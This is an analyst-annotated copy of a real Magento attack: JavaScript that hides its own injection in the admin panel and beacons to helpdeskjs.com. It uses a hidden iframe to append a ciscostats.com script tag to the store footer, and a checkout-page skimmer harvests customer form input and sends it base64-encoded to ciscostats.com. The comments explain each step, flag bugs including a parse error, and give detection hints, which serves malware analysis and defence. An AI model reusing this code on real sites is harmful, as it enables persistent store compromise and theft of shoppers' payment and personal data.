XSS JavaScript payload from helpdeskjs.com that inserts malware into the Magento backend (footer section) -- see also http://gwillem.gitlab.io/2017/12/28/hackers-breach-magento-through-helpdesk/
// Unicode-safe base64 encoder: UTF-8-encode the string, then btoa() it.
// The same btoa(unescape(encodeURIComponent(...))) expression is used inline by the
// exfiltration beacon LycqLBoqkw further down; utoa itself is not called in this listing.
function utoa(str) {
return window.btoa(unescape(encodeURIComponent(str)));
}
// Inverse of utoa: base64-decode, then UTF-8-decode. Not referenced anywhere in this listing.
function atou(str) {
return decodeURIComponent(escape(window.atob(str)));
}
// Entry point of the backend (admin) stage: theDomHasLoaded runs once the page DOM is parsed.
// Network indicators produced by that stage (all hard-coded below): GETs to
// https://helpdeskjs.com/receive.php?url=... and a stored reference to https://ciscostats.com/ga.js.
document.addEventListener("DOMContentLoaded", theDomHasLoaded, false);
// Backend (admin) stage. Steps, in order:
//   1. scrub the injected helpdeskjs.com <script> tag from the page so the admin does not see it;
//   2. beacon the hostname and whether a System Configuration link is present to helpdeskjs.com;
//   3. unless the "scripted" cookie is already "yes", open the configuration page in a hidden
//      iframe, navigate to the design section, append a ciscostats.com <script> tag to the
//      footer setting and click save, beaconing progress along the way.
// NOTE(review): as pasted this function does not parse -- the `else {` after removim("area1")
// has no matching `if`, so a JS engine rejects the whole script. Treat it as an analyst copy.
function theDomHasLoaded() {
// Cover-up: rewrite the literal '<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com'
// (raw and HTML-escaped forms) inside the main container to a harmless-looking email address.
// `replacer` is an implicit global (no var).
replacer = document.getElementById("page:main-container").innerHTML;
replacer = replacer.replace(/<script src\="https:\/\/helpdeskjs\.com\/jquery\.js"><\/script>@gmail\.com/g, 'knockers@yahoo.com');
replacer = replacer.replace(/&lt;script src\="https:\/\/helpdeskjs\.com\/jquery\.js"&gt;&lt;\/script&gt;@gmail\.com/g, 'knockers@yahoo.com');
document.getElementById("page:main-container").innerHTML = replacer;
// Links whose href contains /system_config/index/key -- presumably the admin System Configuration page.
var els = document.querySelectorAll("a[href*='/system_config/index/key']");
// Value of the "scripted" cookie ("" when absent); set to "yes" below once the footer edit has been attempted.
var cooka = document.cookie.replace(/(?:(?:^|.*;\s*)scripted\s*\=\s*([^;]*).*$)|^.*$/, "$1");
var url = window.location.hostname;
// "config 1" if a configuration link exists on this page, else "config 0".
if (els[0] !== undefined) var access = "config 1";
else var access = "config 0";
// Beacon #1: GET https://helpdeskjs.com/receive.php?url=<hostname> <access> via a throwaway <img>.
var img = document.createElement("IMG");
img.id = "gatracking";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+access;
document.body.appendChild(img);
// Remove the beacon element by id (the request is already in flight).
function removim(id){
document.getElementById(id).remove();
}
removim("gatracking");
// Run the footer edit only once per browser (cookie guard) and only if the config link is reachable.
if (cooka != "yes" && els[0]) {
var arrHREF = [];
var i = 0;
for(; i<els.length; i++) {
arrHREF.push(els[i].href);
}
// Load the first configuration link in an invisible iframe (0x0, display:none). `ifrm` is an implicit global.
function makeFrame() {
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", arrHREF[0]);
ifrm.setAttribute("id", "framing");
ifrm.style.height = "0"; //hide iframe
ifrm.style.width = "0"; //hide iframe
ifrm.style.display = "none"; //hide iframe
document.body.appendChild(ifrm);
}
makeFrame();
// Once the configuration page is in the iframe, look for links to the design section inside it.
document.getElementById('framing').onload = function makeFrame2() {
var els2 = document.querySelector('#framing').contentDocument.querySelectorAll("a[href*='/system_config/edit/section/design/key/']");
// Author bug: the else branch assigns `access`, not `design`, so when no design link exists the
// beacon below reports "undefined" and els2[0].click() further down throws a TypeError.
if (els2[0] !== undefined) var design = "design 1";
else var access = "design 0";
// Beacon #2: https://helpdeskjs.com/receive.php?url=<hostname> <design>
var img = document.createElement("IMG");
img.id = "gatracking2";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+design;
document.body.appendChild(img);
function removim(id){
document.getElementById(id).remove();
}
removim("gatracking2");
// Navigate the iframe to the design section by clicking the link inside it.
els2[0].click();
// Re-id the iframe and arm a second onload for the design page.
document.getElementById('framing').id = 'framing2';
document.getElementById('framing2').onload = function changeAcc() {
var iframe = document.getElementById('framing2');
var innerDoc = iframe.contentDocument || iframe.contentWindow.document;
// "Done" marker. A cookie whose expiry is in the past is not stored, so after 18 Dec 2018
// this guard no longer holds and the routine re-runs on every admin page load.
document.cookie = "scripted=yes; expires=Thu, 18 Dec 2018 12:00:00 UTC";
// from here
// The footer HTML setting of the design section.
var footerarea = innerDoc.getElementById('design_footer_absolute_footer');
// getElementById returns null (never undefined) when the field is missing, so this test is always true.
if( footerarea !== undefined) var area = "area 0";
// Beacon #3: https://helpdeskjs.com/receive.php?url=<hostname> area 0
var img = document.createElement("IMG");
img.id = "area1";
img.src = "https://helpdeskjs.com/receive.php?url="+url+" "+area;
document.body.appendChild(img);
function removim(id){
document.getElementById(id).remove();
}
removim("area1");
// Syntax error as pasted: no `if` statement immediately precedes this `else`.
else {
// Idempotence guard: skip if the footer already references ciscostats.
if (innerDoc.getElementById('design_footer_absolute_footer').innerHTML.match("ciscostats")){
}
else {
// Persistence: append the loader tag to the stored footer setting, then press the first
// button whose onclick mentions 'submit' to save it. `saver` is deliberately made a window global.
// Presumably the saved footer is rendered into every storefront page, which is how the
// checkout harvester further down reaches customers -- confirm against the store's theme.
innerDoc.getElementById('design_footer_absolute_footer').innerHTML = innerDoc.getElementById('design_footer_absolute_footer').innerHTML + "<script src=https://ciscostats.com/ga.js></script>" ;
window.saver = innerDoc.querySelectorAll("button[onclick*='submit']");
saver[0].click();
// Beacon #4: "... DONE!". The <img> is appended to the iframe document but removim looks it up
// in the outer document, so getElementById likely returns null and .remove() throws.
var img2 = document.createElement("IMG");
img2.id = "ga-tracking";
img2.src = "https://helpdeskjs.com/receive.php?url="+url+" DONE!";
innerDoc.body.appendChild(img2);
removim("ga-tracking");
}
}
}
}
}
}
// Cosmetic cover-up: after load, any <input> whose value mentions helpdeskjs.com is shown
// as "knockers@yahoo.com" instead. window.onload is assigned again further down in this
// listing, so if both fragments live in the same script this handler is overwritten and
// never runs.
window.onload = function(){
var x=document.getElementsByTagName("input");
for(var i = 0; i < x.length; i++) {
var str=x[i].value;
if (str.indexOf('helpdeskjs.com')!== -1){
x[i].value = "knockers@yahoo.com";
}
}
}
// Exfiltration beacon of the skimmer stage. `b` is the JSON payload built by hotlCkRyRv;
// it is UTF-8 + base64 encoded and sent as the `data` query parameter of a GET to
// https://ciscostats.com/validate.php through a 1x1 <img> that is appended and then
// removed from the DOM (the request is already in flight). Detection hint: image
// requests to that path carrying a long base64 `data` parameter. The
// setTimeout("n=11",3E3) string-eval only sets a global `n` after 3 s -- looks like filler.
function LycqLBoqkw(b){
var c=document.createElement("img");
c.width="1px";
c.height="1px";
c.id="rTbgcrowBT";
c.src="https://ciscostats.com/validate.php?data="+btoa(unescape(encodeURIComponent(b)));setTimeout("n=11",3E3);
document.body.appendChild(c);
var el = document.getElementById( 'rTbgcrowBT' );
el.parentNode.removeChild( el );
}
// Form harvester. Builds "name:value" strings for every <input> and <select> on the page
// (id is used when name is absent), drops input entries matching
// token:|javascript|browser|discounts|step:|reduction|utf8: (CSRF tokens and other noise),
// reports the selected option's visible text for region_id selects, and hands the
// JSON-encoded combined array to LycqLBoqkw. `delete ValueArray[b]` leaves holes, which
// JSON.stringify emits as null.
function hotlCkRyRv(){
var inputs = document.getElementsByTagName('input');
var selects = document.getElementsByTagName('select');
var ValueArray = new Array(inputs.length);
var SelectArray = new Array(selects.length);
for(var b=0; b<inputs.length; b++)
{
if (inputs[b].getAttribute('name') == null){
ValueArray[b] = inputs[b].getAttribute('id') + ":" + inputs[b].value;
}
else {
ValueArray[b] = inputs[b].getAttribute('name') + ":" + inputs[b].value;
}
// match() converts the string to a RegExp, so the | alternation applies.
if(ValueArray[b].match("token:|javascript|browser|discounts|step:|reduction|utf8:")){
delete ValueArray[b];
}
}
for(var i=0; i<selects.length; i++)
{
if (selects[i].getAttribute('name') == null){
SelectArray[i] = selects[i].getAttribute('id') + ":" + selects[i].value;
}
else {
SelectArray[i] = selects[i].getAttribute('name') + ":" + selects[i].value;
// For region selects, send the human-readable option text rather than the numeric value.
if (selects[i].getAttribute('name').indexOf('region_id') >= 0){
var ii = selects[i].options.selectedIndex;
if(typeof selects[i].options[ii] !== "undefined")
{
SelectArray[i] = selects[i].getAttribute('name') + ":" + selects[i].options[ii].text;
}
}
}
}
var SendingData = JSON.stringify(ValueArray.concat(SelectArray));
LycqLBoqkw(SendingData)}
// Trigger for the harvester: when the URL matches a checkout/cart path, every <button> and
// every <input type="submit"> gets a click listener running hotlCkRyRv, so whatever the
// customer has typed into the forms is captured at submit time. match() builds a RegExp
// from the string, so "checkout\/onepage" is just "checkout/onepage". This assignment
// overwrites the earlier window.onload in this listing. `buttons` and `i` are re-declared
// with var (function-scoped, so the second declarations just reassign).
window.onload = function() {
if(window.location.href.match("onestepcheckout|checkout\/onepage|firech|onepagecheckout|onepage|checkout\/cart")){
var buttons = document.getElementsByTagName('button');
for(var i=0; i<buttons.length; i++)
{
buttons[i].addEventListener("click", hotlCkRyRv);
}
var buttons = document.getElementsByTagName('input');
for(var i=0; i<buttons.length; i++)
{
if (buttons[i].type == "submit")buttons[i].addEventListener("click", hotlCkRyRv);
}
}
}